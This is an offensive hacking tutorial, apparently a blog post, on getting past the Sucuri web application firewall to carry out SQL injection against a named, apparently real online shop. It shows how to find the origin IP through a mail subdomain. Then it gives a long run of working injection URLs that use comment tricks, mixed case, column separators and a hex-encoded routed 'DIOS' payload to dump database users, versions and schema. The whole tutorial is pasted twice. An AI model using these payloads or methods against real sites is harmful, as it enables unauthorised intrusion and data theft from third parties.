Bypass Sucuri WebSite Firewall(WAF)
In the Name of ALLAH the Most Beneficent and the Merciful
Hello everyone, in this tutorial we'll bypass the latest WAF Sucuri. Which is becoming a pain in the ass to many Inj3ct0rs. Here are the approaches i am going to use in this tutorial. I wont be explaining any of these approaches in depth as they are or will be explained in Guide to WAF Bypass by SecurityIdiots
In this Tutorial we'll use the following Bypass methods to Bypass WAF
Mount Origin Server to Bypass Proxfied WAF
Commenting and Inline Commenting
URL Encoding
Mix Case to Bypass Case Sensitive Filters
Column Separator WAF bypass
Routed SQLi to Bypass WAF
As Sucuri WAF is a proxy between you and the Web server, as shown in the screenshot.
So we have two different approaches to bypass it. Our first approach to Sucuri WAF bypass will be "Ninja Ways to bypass WAF" where we'll find a stealth backdoor and completely avoid facing the WAF and strike our target from a place about which he never thought of. Mainly a Surprize attack, victim have no choice but to lay down the arms.
Our Second Approach will be "Daya Approach" hope you know what i mean. Here we will Bypass WAF like a Boss, in this approach we ll break directly through the WAF and strike the Application on it face. Hell Yeah!!!
So lets start with the first one. Here as you saw above the attacker is on one side WAF in between and then the server. Now just think Server is live and it must be having a live IP isnt it. What is we get that live IP and send our Injection directly to that IP or Mount the Server to that IP, which will allow our request to avoid WAF and reach directly to the Server. Boom!! we are IN. But now the question is how to get the IP address, well there are loads of ways which i will discuss in our WAF bypass guide but not here. As its not a tutorial where we ll explain everything and discuss all the approaches. Here we ll go Point to Point to bypass this Firewall.
We ll use this site to start with "http://www.mbtagifts.com/shop.php?c=4" lets start. We ll use the mail subdomain to find its real IP and inject the site. Ping to "mail.mbtagifts.com" you ll get the IP "50.28.71.142". Now mount the IP in your Host file or proxy or else you can directly use the IP to inject this site. Here i will use that:
http://50.28.71.142/shop.php?c=4'http://50.28.71.142/shop.php?c=4' order by 31--+
http://50.28.71.142/shop.php?c=4' and false UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30--+
http://50.28.71.142/shop.php?c=4' and false UNION SELECT 1,2,3,4,5,concat%0a(0x4e616d65203a3a205a656e3c6272 3e55736572203a3a20,user(),0x3c62723e4462203a3a20,D atabase(),0x3c62723e56657273696f6e203a3a20,version (),0x3c62723e),7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30--+ Am sure your reaction about this will be :
But dont get so excited so early. That was the stealth Ninja way. Now lets assume it goes so bad that we cant get the Server Direct IP, now we are in a situation to break through the WAF to inject. Lets get over with it already. The read URL below Means detected and the other means bypassed. http://www.mbtagifts.com/shop.php?c=4
http://www.mbtagifts.com/shop.php?c=4'-- -
http://www.mbtagifts.com/shop.php?c=4' order by 10-- -
Order by Bypassed using Comments http://www.mbtagifts.com/shop.php?c=4' grouP by%23%0a20-- -
Columns Found
http://www.mbtagifts.com/shop.php?c=4' grouP by%23%0a30-- -
http://www.mbtagifts.com/shop.php?c=4' union select-- -
http://www.mbtagifts.com/shop.php?c=4' union distinctrow select%23
Sucuri Bypassed Now WAF 2nd http://www.mbtagifts.com/shop.php?c=4'*2e9union select!1%23
Second WAF Bypassed using case change http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1%23
Now have to add 30 Columns http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2%23
No WAF Yet
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10%23
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15%23
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20%23 WAF after 20 columns lets use Columns seperator Style WAF bypass
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25%23 Bypassed http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,~20,21,22,23,24,25%23 30 Columns Done
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,~20,21,22,23,24,25,26,27,28,29,30%23 Now we have to print the output, printing whole output and bypassing other things could be a pain so lets first try "Routed SQL Injection", You can read Routed SQLi if you dont know whats that. So when i started testing as shown below:No Error http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,0x27,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,~20,21,22,23,24,25,26,27,28,29,30%23 No Error
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,0x27,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,~20,21,22,23,24,25,26,27,28,29,30%23 And so i came to Sixth column and got an Extra error. http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,0x27,7,8,9,10,11,12,13,14,15,16,1 7,18,19,~20,21,22,23,24,25,26,27,28,29,30%23 Confirming Routed Query
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,0x6c656c276f72646572206279203123, 7,8,9,10,11,12,13,14,15,16,17,18,19,~20,21,22,23,2 4,25,26,27,28,29,30%23 Now as its confirmed i found out there are 25 columns: Next is injecting Routed Injection:http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,0x6c656c2720554e494f4e2053454c454 3542031333337312c31333337322c31333337332c313333373 42c31333337352c31333337362c31333337372c31333337382 c31333337392c3133333731302c3133333731312c313333373 1322c3133333731332c3133333731342c3133333731352c313 3333731362c3133333731372c3133333731382c31333337313 92c3133333732302c3133333732312c3133333732322c31333 33732332c3133333732342c31333337323523,7,8,9,10,11, 12,13,14,15,16,17,18,19,~20,21,22,23,24,25,26,27,2 8,29,30%23 Check in the source you will see this 13374 printed int the source, Now injecting DIOS in fourth column and extracting Output:
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,0x6c656c2720554e494f4e2053454c454 35420312c322c332c636f6e636174283078323733653363326 63631336533633266373436343365336332663734373233653 36332663734363136323663363533653465363136643635323 03361336132303561363536653363363237323365353537333 635373232303361336132302c7573657228292c30783363363 2373233653434363232303361336132302c446174616261736 528292c3078336336323732336535363635373237333639366 6366532303361336132302c76657273696f6e28292c3078336 33632373233652c6d616b655f73657428362c403a3d3078306 12c2873656c65637428312966726f6d28696e666f726d61746 96f6e5f736368656d612e636f6c756d6e73297768657265287 461626c655f736368656d61213d30783639366536363666373 23664363137343639366636653566373336333638363536643 63129616e64403a3d6d616b655f736574283531312c402c307 833633663363933652c7461626c655f6e616d652c636f6c756 d6e5f6e616d6529292c4029292c352c362c372c382c392c313 02c31312c31322c31332c31342c31352c31362c31372c31382 c31392c32302c32312c32322c32332c32342c323523,7,8,9, 10,11,12,13,14,15,16,17,18,19,~20,21,22,23,24,25,2 6,27,28,29,30%23
Sucuri WAF Bypass Complete
In the Name of ALLAH the Most Beneficent and the Merciful
Hello everyone, in this tutorial we'll bypass the latest WAF Sucuri. Which is becoming a pain in the ass to many Inj3ct0rs. Here are the approaches i am going to use in this tutorial. I wont be explaining any of these approaches in depth as they are or will be explained in Guide to WAF Bypass by SecurityIdiots
In this Tutorial we'll use the following Bypass methods to Bypass WAF
Mount Origin Server to Bypass Proxfied WAF
Commenting and Inline Commenting
URL Encoding
Mix Case to Bypass Case Sensitive Filters
Column Separator WAF bypass
Routed SQLi to Bypass WAF
As Sucuri WAF is a proxy between you and the Web server, as shown in the screenshot.
So we have two different approaches to bypass it. Our first approach to Sucuri WAF bypass will be "Ninja Ways to bypass WAF" where we'll find a stealth backdoor and completely avoid facing the WAF and strike our target from a place about which he never thought of. Mainly a Surprize attack, victim have no choice but to lay down the arms.
Our Second Approach will be "Daya Approach" hope you know what i mean. Here we will Bypass WAF like a Boss, in this approach we ll break directly through the WAF and strike the Application on it face. Hell Yeah!!!
So lets start with the first one. Here as you saw above the attacker is on one side WAF in between and then the server. Now just think Server is live and it must be having a live IP isnt it. What is we get that live IP and send our Injection directly to that IP or Mount the Server to that IP, which will allow our request to avoid WAF and reach directly to the Server. Boom!! we are IN. But now the question is how to get the IP address, well there are loads of ways which i will discuss in our WAF bypass guide but not here. As its not a tutorial where we ll explain everything and discuss all the approaches. Here we ll go Point to Point to bypass this Firewall.
We ll use this site to start with "http://www.mbtagifts.com/shop.php?c=4" lets start. We ll use the mail subdomain to find its real IP and inject the site. Ping to "mail.mbtagifts.com" you ll get the IP "50.28.71.142". Now mount the IP in your Host file or proxy or else you can directly use the IP to inject this site. Here i will use that:
http://50.28.71.142/shop.php?c=4'http://50.28.71.142/shop.php?c=4' order by 31--+
http://50.28.71.142/shop.php?c=4' and false UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30--+
http://50.28.71.142/shop.php?c=4' and false UNION SELECT 1,2,3,4,5,concat%0a(0x4e616d65203a3a205a656e3c6272 3e55736572203a3a20,user(),0x3c62723e4462203a3a20,D atabase(),0x3c62723e56657273696f6e203a3a20,version (),0x3c62723e),7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30--+ Am sure your reaction about this will be :
But dont get so excited so early. That was the stealth Ninja way. Now lets assume it goes so bad that we cant get the Server Direct IP, now we are in a situation to break through the WAF to inject. Lets get over with it already. The read URL below Means detected and the other means bypassed. http://www.mbtagifts.com/shop.php?c=4
http://www.mbtagifts.com/shop.php?c=4'-- -
http://www.mbtagifts.com/shop.php?c=4' order by 10-- -
Order by Bypassed using Comments http://www.mbtagifts.com/shop.php?c=4' grouP by%23%0a20-- -
Columns Found
http://www.mbtagifts.com/shop.php?c=4' grouP by%23%0a30-- -
http://www.mbtagifts.com/shop.php?c=4' union select-- -
http://www.mbtagifts.com/shop.php?c=4' union distinctrow select%23
Sucuri Bypassed Now WAF 2nd http://www.mbtagifts.com/shop.php?c=4'*2e9union select!1%23
Second WAF Bypassed using case change http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1%23
Now have to add 30 Columns http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2%23
No WAF Yet
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10%23
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15%23
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20%23 WAF after 20 columns lets use Columns seperator Style WAF bypass
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25%23 Bypassed http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,~20,21,22,23,24,25%23 30 Columns Done
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,~20,21,22,23,24,25,26,27,28,29,30%23 Now we have to print the output, printing whole output and bypassing other things could be a pain so lets first try "Routed SQL Injection", You can read Routed SQLi if you dont know whats that. So when i started testing as shown below:No Error http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,0x27,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,~20,21,22,23,24,25,26,27,28,29,30%23 No Error
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,0x27,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,~20,21,22,23,24,25,26,27,28,29,30%23 And so i came to Sixth column and got an Extra error. http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,0x27,7,8,9,10,11,12,13,14,15,16,1 7,18,19,~20,21,22,23,24,25,26,27,28,29,30%23 Confirming Routed Query
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,0x6c656c276f72646572206279203123, 7,8,9,10,11,12,13,14,15,16,17,18,19,~20,21,22,23,2 4,25,26,27,28,29,30%23 Now as its confirmed i found out there are 25 columns: Next is injecting Routed Injection:http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,0x6c656c2720554e494f4e2053454c454 3542031333337312c31333337322c31333337332c313333373 42c31333337352c31333337362c31333337372c31333337382 c31333337392c3133333731302c3133333731312c313333373 1322c3133333731332c3133333731342c3133333731352c313 3333731362c3133333731372c3133333731382c31333337313 92c3133333732302c3133333732312c3133333732322c31333 33732332c3133333732342c31333337323523,7,8,9,10,11, 12,13,14,15,16,17,18,19,~20,21,22,23,24,25,26,27,2 8,29,30%23 Check in the source you will see this 13374 printed int the source, Now injecting DIOS in fourth column and extracting Output:
http://www.mbtagifts.com/shop.php?c=4'*2e9unioN Select!1,2,3,4,5,0x6c656c2720554e494f4e2053454c454 35420312c322c332c636f6e636174283078323733653363326 63631336533633266373436343365336332663734373233653 36332663734363136323663363533653465363136643635323 03361336132303561363536653363363237323365353537333 635373232303361336132302c7573657228292c30783363363 2373233653434363232303361336132302c446174616261736 528292c3078336336323732336535363635373237333639366 6366532303361336132302c76657273696f6e28292c3078336 33632373233652c6d616b655f73657428362c403a3d3078306 12c2873656c65637428312966726f6d28696e666f726d61746 96f6e5f736368656d612e636f6c756d6e73297768657265287 461626c655f736368656d61213d30783639366536363666373 23664363137343639366636653566373336333638363536643 63129616e64403a3d6d616b655f736574283531312c402c307 833633663363933652c7461626c655f6e616d652c636f6c756 d6e5f6e616d6529292c4029292c352c362c372c382c392c313 02c31312c31322c31332c31342c31352c31362c31372c31382 c31392c32302c32312c32322c32332c32342c323523,7,8,9, 10,11,12,13,14,15,16,17,18,19,~20,21,22,23,24,25,2 6,27,28,29,30%23
Sucuri WAF Bypass Complete
0 comments:
Post a Comment